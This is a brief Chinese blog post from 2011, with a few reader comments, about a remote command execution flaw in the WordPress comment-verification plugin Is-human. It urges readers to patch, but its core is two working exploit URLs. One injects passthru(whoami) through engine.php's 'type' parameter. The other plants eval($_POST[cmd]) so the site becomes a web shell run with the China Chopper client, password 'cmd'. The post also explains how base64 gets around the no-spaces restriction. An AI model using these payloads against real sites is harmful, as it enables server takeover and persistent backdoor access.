Is-human是WordPress的一个发表评论验证插件。
这个插件的漏洞能导致远程命令执行。
以下是BUG原理,各位博友赶快修复。
EXP:
server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error
其中,passthru(whoami)这里可以执行任意命令,比如ls,uname等。但uname -a, wget等无法执行,含有空格。需要base64编码。
EXP:
server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval($_POST[cmd]);error
被放入菜刀后,密码为cmd。
文章地址:http://blog.nodll.com/2011/05/19/wordpress-is-human-bug/Pray.html
星期三, 八月 3, 2011 at 21:03
持之以恒干革命的硬道理,至于你信不信,反正我信了
星期三, 七月 13, 2011 at 16:32
这个 WordPress 插件 看过, 但是不懂的啥意思
星期五, 六月 3, 2011 at 19:19
额。。可惜我不用WP的,不过也先收藏吧,以后或许会用的着。。欢迎博主回访
星期六, 五月 21, 2011 at 21:30
貌似没有这么个插件